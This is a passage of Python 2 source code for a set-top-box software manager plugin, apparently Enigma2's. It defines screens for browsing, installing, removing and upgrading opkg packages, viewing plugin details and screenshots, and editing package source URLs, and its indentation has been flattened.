return(( _("Common Interface"), _("View list of available CommonInterface extensions" ), tag, divpng ))
elif tag == 'Default':
return(( _("Default settings"), _("View list of available default settings" ), tag, divpng ))
elif tag == 'SAT':
return(( _("Satellite equipment"), _("View list of available Satellite equipment extensions." ), tag, divpng ))
elif tag == 'Software':
return(( _("Software"), _("View list of available software extensions" ), tag, divpng ))
elif tag == 'Multimedia':
return(( _("Multimedia"), _("View list of available multimedia extensions." ), tag, divpng ))
elif tag == 'Display':
return(( _("Display and userinterface"), _("View list of available display and userinterface extensions." ), tag, divpng ))
elif tag == 'EPG':
return(( _("Electronic Program Guide"), _("View list of available EPG extensions." ), tag, divpng ))
elif tag == 'Communication':
return(( _("Communication"), _("View list of available communication extensions." ), tag, divpng ))
else: # dynamically generate non existent tags
return(( str(tag), _("View list of available ") + str(tag) + _(" extensions." ), tag, divpng ))
def prepareInstall(self):
self.cmdList = []
if iSoftwareTools.available_updates > 0:
self.cmdList.append((IpkgComponent.CMD_UPGRADE, { "test_only": False }))
if self.selectedFiles and len(self.selectedFiles):
for plugin in self.selectedFiles:
detailsfile = iSoftwareTools.directory[0] + "/" + plugin[0]
if (os_path.exists(detailsfile) == True):
iSoftwareTools.fillPackageDetails(plugin[0])
self.package = iSoftwareTools.packageDetails[0]
if self.package[0].has_key("attributes"):
self.attributes = self.package[0]["attributes"]
if self.attributes.has_key("needsRestart"):
self.restartRequired = True
if self.attributes.has_key("package"):
self.packagefiles = self.attributes["package"]
if plugin[1] == 'installed':
if self.packagefiles:
for package in self.packagefiles[:]:
self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": package["name"] }))
else:
self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": plugin[2] }))
else:
if self.packagefiles:
for package in self.packagefiles[:]:
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package["name"] }))
else:
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": plugin[2] }))
else:
if plugin[1] == 'installed':
self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": plugin[2] }))
else:
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": plugin[2] }))
def runExecute(self, result = None):
if result is not None:
if result[0] is True:
self.session.openWithCallback(self.runExecuteFinished, Ipkg, cmdList = self.cmdList)
elif result[0] is False:
self.cmdList = result[1]
self.session.openWithCallback(self.runExecuteFinished, Ipkg, cmdList = self.cmdList)
else:
self.close()
def runExecuteFinished(self):
self.reloadPluginlist()
if plugins.restartRequired or self.restartRequired:
self.session.openWithCallback(self.ExecuteReboot, MessageBox, _("Installation or removal has completed.") + "\n" +_("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
else:
self.selectedFiles = []
self.restartRequired = False
self.detailsClosed(True)
def ExecuteReboot(self, result):
if result:
self.session.open(TryQuitMainloop,retvalue=3)
else:
self.selectedFiles = []
self.restartRequired = False
self.detailsClosed(True)
def reloadPluginlist(self):
plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
class PluginManagerInfo(Screen):
skin = """
<screen name="PluginManagerInfo" position="center,center" size="560,450" title="Plugin manager activity information" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="list" render="Listbox" position="5,50" size="550,350" scrollbarMode="showOnDemand" selectionDisabled="1">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (50, 0), size = (150, 26), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (50, 27), size = (540, 23), font=1, flags = RT_HALIGN_LEFT, text = 1), # index 1 is the state
MultiContentEntryPixmapAlphaTest(pos = (0, 1), size = (48, 48), png = 2), # index 2 is the status pixmap
MultiContentEntryPixmapAlphaTest(pos = (0, 48), size = (550, 2), png = 3), # index 3 is the div pixmap
],
"fonts": [gFont("Regular", 24),gFont("Regular", 22)],
"itemHeight": 50
}
</convert>
</widget>
<ePixmap pixmap="skin_default/div-h.png" position="0,404" zPosition="10" size="560,2" transparent="1" alphatest="on" />
<widget source="status" render="Label" position="5,408" zPosition="10" size="550,44" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, plugin_path, cmdlist = None):
Screen.__init__(self, session)
self.session = session
self.skin_path = plugin_path
self.cmdlist = cmdlist
self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions"],
{
"ok": self.process_all,
"back": self.exit,
"red": self.exit,
"green": self.process_extensions,
}, -1)
self.list = []
self["list"] = List(self.list)
self["key_red"] = StaticText(_("Cancel"))
self["key_green"] = StaticText(_("Only extensions."))
self["status"] = StaticText(_("Following tasks will be done after you press OK!"))
self.onShown.append(self.setWindowTitle)
self.onLayoutFinish.append(self.rebuildList)
def setWindowTitle(self):
self.setTitle(_("Plugin manager activity information"))
def rebuildList(self):
self.list = []
if self.cmdlist is not None:
for entry in self.cmdlist:
action = ""
info = ""
cmd = entry[0]
if cmd == 0:
action = 'install'
elif cmd == 2:
action = 'remove'
else:
action = 'upgrade'
args = entry[1]
if cmd == 0:
info = args['package']
elif cmd == 2:
info = args['package']
else:
info = _("receiver software because updates are available.")
self.list.append(self.buildEntryComponent(action,info))
self['list'].setList(self.list)
self['list'].updateList(self.list)
def buildEntryComponent(self, action,info):
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
upgradepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
installpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/install.png"))
removepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
if action == 'install':
return(( _('Installing'), info, installpng, divpng))
elif action == 'remove':
return(( _('Removing'), info, removepng, divpng))
else:
return(( _('Upgrading'), info, upgradepng, divpng))
def exit(self):
self.close()
def process_all(self):
self.close((True,None))
def process_extensions(self):
self.list = []
if self.cmdlist is not None:
for entry in self.cmdlist:
cmd = entry[0]
if entry[0] in (0,2):
self.list.append((entry))
self.close((False,self.list))
class PluginManagerHelp(Screen):
skin = """
<screen name="PluginManagerHelp" position="center,center" size="560,450" title="Plugin manager help" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="list" render="Listbox" position="5,50" size="550,350" scrollbarMode="showOnDemand" selectionDisabled="1">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (50, 0), size = (540, 26), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (50, 27), size = (540, 23), font=1, flags = RT_HALIGN_LEFT, text = 1), # index 1 is the state
MultiContentEntryPixmapAlphaTest(pos = (0, 1), size = (48, 48), png = 2), # index 2 is the status pixmap
MultiContentEntryPixmapAlphaTest(pos = (0, 48), size = (550, 2), png = 3), # index 3 is the div pixmap
],
"fonts": [gFont("Regular", 24),gFont("Regular", 22)],
"itemHeight": 50
}
</convert>
</widget>
<ePixmap pixmap="skin_default/div-h.png" position="0,404" zPosition="10" size="560,2" transparent="1" alphatest="on" />
<widget source="status" render="Label" position="5,408" zPosition="10" size="550,44" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, plugin_path):
Screen.__init__(self, session)
self.session = session
self.skin_path = plugin_path
self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions"],
{
"back": self.exit,
"red": self.exit,
}, -1)
self.list = []
self["list"] = List(self.list)
self["key_red"] = StaticText(_("Close"))
self["status"] = StaticText(_("A small overview of the available icon states and actions."))
self.onShown.append(self.setWindowTitle)
self.onLayoutFinish.append(self.rebuildList)
def setWindowTitle(self):
self.setTitle(_("Plugin manager help"))
def rebuildList(self):
self.list = []
self.list.append(self.buildEntryComponent('install'))
self.list.append(self.buildEntryComponent('installable'))
self.list.append(self.buildEntryComponent('installed'))
self.list.append(self.buildEntryComponent('remove'))
self['list'].setList(self.list)
self['list'].updateList(self.list)
def buildEntryComponent(self, state):
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
installedpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installed.png"))
installablepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installable.png"))
removepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
installpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/install.png"))
if state == 'installed':
return(( _('This plugin is installed.'), _('You can remove this plugin.'), installedpng, divpng))
elif state == 'installable':
return(( _('This plugin is not installed.'), _('You can install this plugin.'), installablepng, divpng))
elif state == 'install':
return(( _('This plugin will be installed.'), _('You can cancel the installation.'), installpng, divpng))
elif state == 'remove':
return(( _('This plugin will be removed.'), _('You can cancel the removal.'), removepng, divpng))
def exit(self):
self.close()
class PluginDetails(Screen, PackageInfoHandler):
skin = """
<screen name="PluginDetails" position="center,center" size="600,440" title="Plugin details" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="author" render="Label" position="10,50" size="500,25" zPosition="10" font="Regular;21" transparent="1" />
<widget name="statuspic" position="550,40" size="48,48" alphatest="on"/>
<widget name="divpic" position="0,80" size="600,2" alphatest="on"/>
<widget name="detailtext" position="10,90" size="270,330" zPosition="10" font="Regular;21" transparent="1" halign="left" valign="top"/>
<widget name="screenshot" position="290,90" size="300,330" alphatest="on"/>
</screen>"""
def __init__(self, session, plugin_path, packagedata = None):
Screen.__init__(self, session)
self.skin_path = plugin_path
self.language = language.getLanguage()[:2] # getLanguage returns e.g. "fi_FI" for "language_country"
self.attributes = None
PackageInfoHandler.__init__(self, self.statusCallback, blocking = False)
self.directory = resolveFilename(SCOPE_METADIR)
if packagedata:
self.pluginname = packagedata[0]
self.details = packagedata[1]
self.pluginstate = packagedata[4]
self.statuspicinstance = packagedata[5]
self.divpicinstance = packagedata[6]
self.fillPackageDetails(self.details)
self.thumbnail = ""
self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions"],
{
"back": self.exit,
"red": self.exit,
"green": self.go,
"up": self.pageUp,
"down": self.pageDown,
"left": self.pageUp,
"right": self.pageDown,
}, -1)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText("")
self["author"] = StaticText()
self["statuspic"] = Pixmap()
self["divpic"] = Pixmap()
self["screenshot"] = Pixmap()
self["detailtext"] = ScrollLabel()
self["statuspic"].hide()
self["screenshot"].hide()
self["divpic"].hide()
self.package = self.packageDetails[0]
if self.package[0].has_key("attributes"):
self.attributes = self.package[0]["attributes"]
self.restartRequired = False
self.cmdList = []
self.oktext = _("\nAfter pressing OK, please wait!")
self.picload = ePicLoad()
self.picload.PictureData.get().append(self.paintScreenshotPixmapCB)
self.onShown.append(self.setWindowTitle)
self.onLayoutFinish.append(self.setInfos)
def setWindowTitle(self):
self.setTitle(_("Details for plugin: ") + self.pluginname )
def exit(self):
self.close(False)
def pageUp(self):
self["detailtext"].pageUp()
def pageDown(self):
self["detailtext"].pageDown()
def statusCallback(self, status, progress):
pass
def setInfos(self):
if self.attributes.has_key("screenshot"):
self.loadThumbnail(self.attributes)
if self.attributes.has_key("name"):
self.pluginname = self.attributes["name"]
else:
self.pluginname = _("unknown")
if self.attributes.has_key("author"):
self.author = self.attributes["author"]
else:
self.author = _("unknown")
if self.attributes.has_key("description"):
self.description = _(self.attributes["description"].replace("\\n", "\n"))
else:
self.description = _("No description available.")
self["author"].setText(_("Author: ") + self.author)
self["detailtext"].setText(_(self.description))
if self.pluginstate in ('installable', 'install'):
if iSoftwareTools.NetworkConnectionAvailable:
self["key_green"].setText(_("Install"))
else:
self["key_green"].setText("")
else:
self["key_green"].setText(_("Remove"))
def loadThumbnail(self, entry):
thumbnailUrl = None
if entry.has_key("screenshot"):
thumbnailUrl = entry["screenshot"]
if self.language == "de":
if thumbnailUrl[-7:] == "_en.jpg":
thumbnailUrl = thumbnailUrl[:-7] + "_de.jpg"
if thumbnailUrl is not None:
self.thumbnail = "/tmp/" + thumbnailUrl.split('/')[-1]
print "[PluginDetails] downloading screenshot " + thumbnailUrl + " to " + self.thumbnail
if iSoftwareTools.NetworkConnectionAvailable:
client.downloadPage(thumbnailUrl,self.thumbnail).addCallback(self.setThumbnail).addErrback(self.fetchFailed)
else:
self.setThumbnail(noScreenshot = True)
else:
self.setThumbnail(noScreenshot = True)
def setThumbnail(self, noScreenshot = False):
if not noScreenshot:
filename = self.thumbnail
else:
filename = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/noprev.png")
sc = AVSwitch().getFramebufferScale()
self.picload.setPara((self["screenshot"].instance.size().width(), self["screenshot"].instance.size().height(), sc[0], sc[1], False, 1, "#00000000"))
self.picload.startDecode(filename)
if self.statuspicinstance != None:
self["statuspic"].instance.setPixmap(self.statuspicinstance.__deref__())
self["statuspic"].show()
if self.divpicinstance != None:
self["divpic"].instance.setPixmap(self.divpicinstance.__deref__())
self["divpic"].show()
def paintScreenshotPixmapCB(self, picInfo=None):
ptr = self.picload.getData()
if ptr != None:
self["screenshot"].instance.setPixmap(ptr.__deref__())
self["screenshot"].show()
else:
self.setThumbnail(noScreenshot = True)
def go(self):
if self.attributes.has_key("package"):
self.packagefiles = self.attributes["package"]
if self.attributes.has_key("needsRestart"):
self.restartRequired = True
self.cmdList = []
if self.pluginstate in ('installed', 'remove'):
if self.packagefiles:
for package in self.packagefiles[:]:
self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": package["name"] }))
if len(self.cmdList):
self.session.openWithCallback(self.runRemove, MessageBox, _("Do you want to remove the package:\n") + self.pluginname + "\n" + self.oktext)
else:
if iSoftwareTools.NetworkConnectionAvailable:
if self.packagefiles:
for package in self.packagefiles[:]:
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package["name"] }))
if len(self.cmdList):
self.session.openWithCallback(self.runUpgrade, MessageBox, _("Do you want to install the package:\n") + self.pluginname + "\n" + self.oktext)
def runUpgrade(self, result):
if result:
self.session.openWithCallback(self.runUpgradeFinished, Ipkg, cmdList = self.cmdList)
def runUpgradeFinished(self):
self.reloadPluginlist()
if plugins.restartRequired or self.restartRequired:
self.session.openWithCallback(self.UpgradeReboot, MessageBox, _("Installation has completed.") + "\n" + _("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
else:
self.close(True)
def UpgradeReboot(self, result):
if result:
self.session.open(TryQuitMainloop,retvalue=3)
self.close(True)
def runRemove(self, result):
if result:
self.session.openWithCallback(self.runRemoveFinished, Ipkg, cmdList = self.cmdList)
def runRemoveFinished(self):
self.close(True)
def reloadPluginlist(self):
plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
def fetchFailed(self,string):
self.setThumbnail(noScreenshot = True)
print "[PluginDetails] fetch failed " + string.getErrorMessage()
class IPKGMenu(Screen):
skin = """
<screen name="IPKGMenu" position="center,center" size="560,400" title="Select upgrade source to edit." >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget name="filelist" position="5,50" size="550,340" scrollbarMode="showOnDemand" />
</screen>"""
def __init__(self, session, plugin_path):
Screen.__init__(self, session)
self.skin_path = plugin_path
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Edit"))
self.sel = []
self.val = []
self.entry = False
self.exe = False
self.path = ""
self["actions"] = NumberActionMap(["SetupActions"],
{
"ok": self.KeyOk,
"cancel": self.keyCancel
}, -1)
self["shortcuts"] = ActionMap(["ShortcutActions"],
{
"red": self.keyCancel,
"green": self.KeyOk,
})
self["filelist"] = MenuList([])
self.fill_list()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setWindowTitle()
def setWindowTitle(self):
self.setTitle(_("Select upgrade source to edit."))
def fill_list(self):
flist = []
self.path = '/etc/opkg/'
if (os_path.exists(self.path) == False):
self.entry = False
return
for file in listdir(self.path):
if file.endswith(".conf"):
if file not in ('arch.conf', 'opkg.conf'):
flist.append((file))
self.entry = True
self["filelist"].l.setList(flist)
def KeyOk(self):
if (self.exe == False) and (self.entry == True):
self.sel = self["filelist"].getCurrent()
self.val = self.path + self.sel
self.session.open(IPKGSource, self.val)
def keyCancel(self):
self.close()
def Exit(self):
self.close()
class IPKGSource(Screen):
skin = """
<screen name="IPKGSource" position="center,center" size="560,80" title="Edit upgrade source url." >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget name="text" position="5,50" size="550,25" font="Regular;20" backgroundColor="background" foregroundColor="#cccccc" />
</screen>"""
def __init__(self, session, configfile = None):
Screen.__init__(self, session)
self.session = session
self.configfile = configfile
text = ""
if self.configfile:
try:
fp = file(configfile, 'r')
sources = fp.readlines()
if sources:
text = sources[0]
fp.close()
except IOError:
pass
desk = getDesktop(0)
x= int(desk.size().width())
y= int(desk.size().height())
self["key_red"] = StaticText(_("Cancel"))
self["key_green"] = StaticText(_("Save"))
if (y>=720):
self["text"] = Input(text, maxSize=False, type=Input.TEXT)
else:
self["text"] = Input(text, maxSize=False, visible_width = 55, type=Input.TEXT)
self["actions"] = NumberActionMap(["WizardActions", "InputActions", "TextEntryActions", "KeyboardInputActions","ShortcutActions"],
{
"ok": self.go,
"back": self.close,
"red": self.close,
"green": self.go,
"left": self.keyLeft,
"right": self.keyRight,
"home": self.keyHome,
"end": self.keyEnd,
"deleteForward": self.keyDeleteForward,
"deleteBackward": self.keyDeleteBackward,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal
}, -1)
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setWindowTitle()
self["text"].right()
def setWindowTitle(self):
self.setTitle(_("Edit upgrade source url."))
def go(self):
text = self["text"].getText()
if text:
fp = file(self.configfile, 'w')
fp.write(text)
fp.write("\n")
fp.close()
self.close()
def keyLeft(self):
self["text"].left()
def keyRight(self):
self["text"].right()
def keyHome(self):
self["text"].home()
def keyEnd(self):
self["text"].end()
def keyDeleteForward(self):
self["text"].delete()
def keyDeleteBackward(self):
self["text"].deleteBackward()
def keyNumberGlobal(self, number):
self["text"].number(number)
class PacketManager(Screen, NumericalTextInput):
skin = """
<screen name="PacketManager" position="center,center" size="530,420" title="Packet manager" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="list" render="Listbox" position="5,50" size="520,365" scrollbarMode="showOnDemand">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (5, 1), size = (440, 28), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (5, 26), size = (440, 20), font=1, flags = RT_HALIGN_LEFT, text = 2), # index 2 is the description
MultiContentEntryPixmapAlphaTest(pos = (445, 2), size = (48, 48), png = 4), # index 4 is the status pixmap
MultiContentEntryPixmapAlphaTest(pos = (5, 50), size = (510, 2), png = 5), # index 4 is the div pixmap
],
"fonts": [gFont("Regular", 22),gFont("Regular", 14)],
"itemHeight": 52
}
</convert>
</widget>
</screen>"""
def __init__(self, session, plugin_path, args = None):
Screen.__init__(self, session)
NumericalTextInput.__init__(self)
self.session = session
self.skin_path = plugin_path
self.setUseableChars(u'1234567890abcdefghijklmnopqrstuvwxyz')
self["shortcuts"] = NumberActionMap(["ShortcutActions", "WizardActions", "NumberActions", "InputActions", "InputAsciiActions", "KeyboardInputActions" ],
{
"ok": self.go,
"back": self.exit,
"red": self.exit,
"green": self.reload,
"gotAsciiCode": self.keyGotAscii,
"1": self.keyNumberGlobal,
"2": self.keyNumberGlobal,
"3": self.keyNumberGlobal,
"4": self.keyNumberGlobal,
"5": self.keyNumberGlobal,
"6": self.keyNumberGlobal,
"7": self.keyNumberGlobal,
"8": self.keyNumberGlobal,
"9": self.keyNumberGlobal,
"0": self.keyNumberGlobal
}, -1)
self.list = []
self.statuslist = []
self["list"] = List(self.list)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText(_("Reload"))
self.list_updating = True
self.packetlist = []
self.installed_packetlist = {}
self.upgradeable_packages = {}
self.Console = Console()
self.cmdList = []
self.cachelist = []
self.cache_ttl = 86400 #600 is default, 0 disables, Seconds cache is considered valid (24h should be ok for caching ipkgs)
self.cache_file = eEnv.resolve('${libdir}/enigma2/python/Plugins/SystemPlugins/SoftwareManager/packetmanager.cache') #Path to cache directory
self.oktext = _("\nAfter pressing OK, please wait!")
self.unwanted_extensions = ('-dbg', '-dev', '-doc', '-staticdev', '-src', 'busybox')
self.ipkg = IpkgComponent()
self.ipkg.addCallback(self.ipkgCallback)
self.onShown.append(self.setWindowTitle)
self.onLayoutFinish.append(self.rebuildList)
rcinput = eRCInput.getInstance()
rcinput.setKeyboardMode(rcinput.kmAscii)
def keyNumberGlobal(self, val):
key = self.getKey(val)
if key is not None:
keyvalue = key.encode("utf-8")
if len(keyvalue) == 1:
self.setNextIdx(keyvalue[0])
def keyGotAscii(self):
keyvalue = unichr(getPrevAsciiCode()).encode("utf-8")
if len(keyvalue) == 1:
self.setNextIdx(keyvalue[0])
def setNextIdx(self,char):
if char in ("0", "1", "a"):
self["list"].setIndex(0)
else:
idx = self.getNextIdx(char)
if idx and idx <= self["list"].count:
self["list"].setIndex(idx)
def getNextIdx(self,char):
for idx, i in enumerate(self["list"].list):
if i[0] and (i[0][0] == char):
return idx
def exit(self):
self.ipkg.stop()
if self.Console is not None:
if len(self.Console.appContainers):
for name in self.Console.appContainers.keys():
self.Console.kill(name)
rcinput = eRCInput.getInstance()
rcinput.setKeyboardMode(rcinput.kmNone)
self.close()
def reload(self):
if (os_path.exists(self.cache_file) == True):
remove(self.cache_file)
self.list_updating = True
self.rebuildList()
def setWindowTitle(self):
self.setTitle(_("Packet manager"))
def setStatus(self,status = None):
if status:
self.statuslist = []
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
if status == 'update':
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
self.statuslist.append(( _("Package list update"), '', _("Trying to download a new packetlist. Please wait..." ),'',statuspng, divpng ))
self['list'].setList(self.statuslist)
elif status == 'error':
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
self.statuslist.append(( _("Error"), '', _("An error occurred while downloading the packetlist. Please try again." ),'',statuspng, divpng ))
self['list'].setList(self.statuslist)
def rebuildList(self):
self.setStatus('update')
self.inv_cache = 0
self.vc = valid_cache(self.cache_file, self.cache_ttl)
if self.cache_ttl > 0 and self.vc != 0:
try:
self.buildPacketList()
except:
self.inv_cache = 1
if self.cache_ttl == 0 or self.inv_cache == 1 or self.vc == 0:
self.run = 0
self.ipkg.startCmd(IpkgComponent.CMD_UPDATE)
def go(self, returnValue = None):
cur = self["list"].getCurrent()
if cur:
status = cur[3]
package = cur[0]
self.cmdList = []
if status == 'installed':
self.cmdList.append((IpkgComponent.CMD_REMOVE, { "package": package }))
if len(self.cmdList):
self.session.openWithCallback(self.runRemove, MessageBox, _("Do you want to remove the package:\n") + package + "\n" + self.oktext)
elif status == 'upgradeable':
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package }))
if len(self.cmdList):
self.session.openWithCallback(self.runUpgrade, MessageBox, _("Do you want to upgrade the package:\n") + package + "\n" + self.oktext)
elif status == "installable":
self.cmdList.append((IpkgComponent.CMD_INSTALL, { "package": package }))
if len(self.cmdList):
self.session.openWithCallback(self.runUpgrade, MessageBox, _("Do you want to install the package:\n") + package + "\n" + self.oktext)
def runRemove(self, result):
if result:
self.session.openWithCallback(self.runRemoveFinished, Ipkg, cmdList = self.cmdList)
def runRemoveFinished(self):
self.session.openWithCallback(self.RemoveReboot, MessageBox, _("Removal has completed.") + "\n" + _("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
def RemoveReboot(self, result):
if result is None:
return
if result is False:
cur = self["list"].getCurrent()
if cur:
item = self['list'].getIndex()
self.list[item] = self.buildEntryComponent(cur[0], cur[1], cur[2], 'installable')
self.cachelist[item] = [cur[0], cur[1], cur[2], 'installable']
self['list'].setList(self.list)
write_cache(self.cache_file, self.cachelist)
self.reloadPluginlist()
if result:
self.session.open(TryQuitMainloop,retvalue=3)
def runUpgrade(self, result):
if result:
self.session.openWithCallback(self.runUpgradeFinished, Ipkg, cmdList = self.cmdList)
def runUpgradeFinished(self):
self.session.openWithCallback(self.UpgradeReboot, MessageBox, _("Update has completed.") + "\n" +_("Do you want to reboot your receiver?"), MessageBox.TYPE_YESNO)
def UpgradeReboot(self, result):
if result is None:
return
if result is False:
cur = self["list"].getCurrent()
if cur:
item = self['list'].getIndex()
self.list[item] = self.buildEntryComponent(cur[0], cur[1], cur[2], 'installed')
self.cachelist[item] = [cur[0], cur[1], cur[2], 'installed']
self['list'].setList(self.list)
write_cache(self.cache_file, self.cachelist)
self.reloadPluginlist()
if result:
self.session.open(TryQuitMainloop,retvalue=3)
def ipkgCallback(self, event, param):
if event == IpkgComponent.EVENT_ERROR:
self.list_updating = False
self.setStatus('error')
elif event == IpkgComponent.EVENT_DONE:
if self.list_updating:
self.list_updating = False
if not self.Console:
self.Console = Console()
cmd = self.ipkg.ipkg + " list"
self.Console.ePopen(cmd, self.IpkgList_Finished)
pass
def IpkgList_Finished(self, result, retval, extra_args = None):
if result:
self.packetlist = []
last_name = ""
for x in result.splitlines():
tokens = x.split(' - ')
name = tokens[0].strip()
if not any(name.endswith(x) for x in self.unwanted_extensions):
l = len(tokens)
version = l > 1 and tokens[1].strip() or ""
descr = l > 2 and tokens[2].strip() or ""
if name == last_name:
continue
last_name = name
self.packetlist.append([name, version, descr])
if not self.Console:
self.Console = Console()
cmd = self.ipkg.ipkg + " list_installed"
self.Console.ePopen(cmd, self.IpkgListInstalled_Finished)
def IpkgListInstalled_Finished(self, result, retval, extra_args = None):
if result:
self.installed_packetlist = {}
for x in result.splitlines():
tokens = x.split(' - ')
name = tokens[0].strip()
if not any(name.endswith(x) for x in self.unwanted_extensions):
l = len(tokens)
version = l > 1 and tokens[1].strip() or ""
self.installed_packetlist[name] = version
if not self.Console:
self.Console = Console()
cmd = "opkg list-upgradable"
self.Console.ePopen(cmd, self.OpkgListUpgradeable_Finished)
def OpkgListUpgradeable_Finished(self, result, retval, extra_args = None):
if result:
self.upgradeable_packages = {}
for x in result.splitlines():
tokens = x.split(' - ')
name = tokens[0].strip()
if not any(name.endswith(x) for x in self.unwanted_extensions):
l = len(tokens)
version = l > 2 and tokens[2].strip() or ""
self.upgradeable_packages[name] = version
self.buildPacketList()
def buildEntryComponent(self, name, version, description, state):
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
if not description:
description = "No description available."
if state == 'installed':
installedpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installed.png"))
